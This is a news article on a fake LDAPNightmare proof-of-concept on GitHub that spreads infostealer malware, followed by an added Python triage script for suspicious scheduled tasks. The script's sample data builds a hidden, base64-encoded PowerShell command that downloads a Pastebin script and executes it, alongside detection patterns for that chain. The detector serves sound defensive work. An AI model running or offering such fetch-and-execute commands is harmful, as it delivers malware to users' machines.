A deceptive proof-of-concept (PoC) exploit for CVE-2024-49113 (aka “LDAPNightmare”) on GitHub infects users with infostealer malware that exfiltrates sensitive data to an external FTP server.
The tactic is not novel, as there have been numerous documented cases of malicious tools disguised as PoC exploits on GitHub.
However, this case, discovered by Trend Micro, highlights that threat actors continue to use the tactic to trick unsuspecting users into infecting themselves with malware.

Source: Trend Micro
A deceptive exploit
Trend Micro reports that the malicious GitHub repository contains a project that appears to have been forked from SafeBreach Labs’ legitimate PoC for CVE-2024-49113, published on January 1, 2025.
The flaw is one of two impacting Windows Lightweight Directory Access Protocol (LDAP) that Microsoft fixed in its December 2024 Patch Tuesday, the other being a critical remote code execution (RCE) problem tracked as CVE-2024-49112.
SafeBreach’s initial blog post about the PoC mistakenly mentioned CVE-2024-49112, whereas their PoC was for CVE-2024-49113, which is a lower-severity denial-of-service vulnerability.
This error, even though it was corrected later, created greater interest and buzz around LDAPNightmare and its potential for attacks, which is likely what the threat actors tried to take advantage of.
Users downloading the PoC from the malicious repository get a UPX-packed executable ‘poc.exe’ which, upon execution, drops a PowerShell script in the victim’s %Temp% folder.
The script creates a scheduled task on the compromised system, which executes an encoded script that fetches a third script from Pastebin.
This final payload collects computer information, process lists, directory lists, IP address, and network adapter information, as well as installed updates, and uploads them in ZIP archive form to an external FTP server using hardcoded credentials.
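As an added example (not from the article or from Trend Micro’s report), the following Python triage script checks scheduled-task command lines for the traits of the chain described above: a PowerShell -EncodedCommand payload, a fetch from pastebin.com, a hidden window, a script under %Temp%, or an ftp:// URL. The task records and the Pastebin URL are constructed sample input.

```python
import base64
import re

def encode_ps_command(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample records (task name, command line), as a scheduled-task
# creation audit or task export would show them; the Pastebin URL is a placeholder.
SAMPLE_TASKS = [
    ("Backup", r"C:\Windows\System32\cmd.exe /c copy D:\data E:\backup"),
    ("Updater", "powershell.exe -w hidden -nop -enc " + encode_ps_command(
        "$s = (New-Object Net.WebClient).DownloadString("
        "'https://pastebin.com/raw/PLACEHOLDER'); Invoke-Expression $s")),
    ("Cleanup", r"powershell.exe -File C:\Users\bob\AppData\Local\Temp\stage1.ps1"),
]

# -e, -en, -enc and -EncodedCommand are all accepted abbreviations of the flag.
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Traits from the described chain, matched over the raw command line plus the
# decoded payload when one is present.
SUSPICIOUS = {
    "pastebin": re.compile(r"pastebin\.com", re.I),
    "temp_script": re.compile(r"\\Temp\\[^\s\"']+\.ps1", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "ftp": re.compile(r"\bftp://", re.I),
}

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed base64 or non-UTF-16 payload: leave undecoded

def triage_task(name: str, cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [k for k, rx in SUSPICIOUS.items() if rx.search(text)]
    if decoded:
        hits.insert(0, "encoded_command")
    return {"task": name, "decoded": decoded, "indicators": hits}

def triage_all(tasks) -> list:
    """Only tasks with at least one indicator are returned, for analyst review."""
    return [r for r in (triage_task(n, c) for n, c in tasks) if r["indicators"]]
```

On a live host the same functions can be fed the command lines exported by schtasks or collected from task-creation audit events.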

Source: Trend Micro
A list of the indicators of compromise for this attack can be found here.
GitHub users sourcing public exploits for research or testing need to exercise caution and ideally only trust cybersecurity companies and researchers with a good reputation.
Threat actors have tried to impersonate well-known security researchers in the past, so validating repository authenticity is also essential.
If possible, review the code before executing it on your system, upload binaries to VirusTotal, and skip anything that appears obfuscated.